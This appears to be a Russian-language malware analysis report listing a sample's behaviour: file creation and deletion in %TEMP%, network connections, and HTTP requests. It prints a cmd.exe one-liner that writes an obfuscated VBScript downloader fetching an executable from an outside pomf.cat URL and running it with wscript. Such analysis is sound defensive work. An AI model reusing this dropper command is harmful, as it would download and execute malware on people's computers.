Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO W5l= "http://a.pomf.cat/iugavu.exe">>C9r.VBS &@ECHO A2l = E7a("ddOkbs")>>C9r.VBS &@ECHO Set R2u = CreateObject(E7a("ntynmSOynmiuuq"))>>C9r.VBS &@ECHO R2u.Open E7a("hfu"), W...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\c9r.vbs
Удаляет следующие файлы
- %TEMP%\c9r.vbs
Сетевая активность
Подключается к
- 'a.##mf.cat':80
TCP
Запросы HTTP GET
- http://a.##mf.cat/iugavu.exe
UDP
- DNS ASK a.##mf.cat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\C9r.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO W5l= "http://a.pomf.cat/iugavu.exe">>C9r.VBS &@ECHO A2l = E7a("ddOkbs")>>C9r.VBS &@ECHO Set R2u = CreateObject(E7a("ntynmSOynmiuuq"))>>C9r.VBS &@ECHO R2u.Open E7a("hfu"), W...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
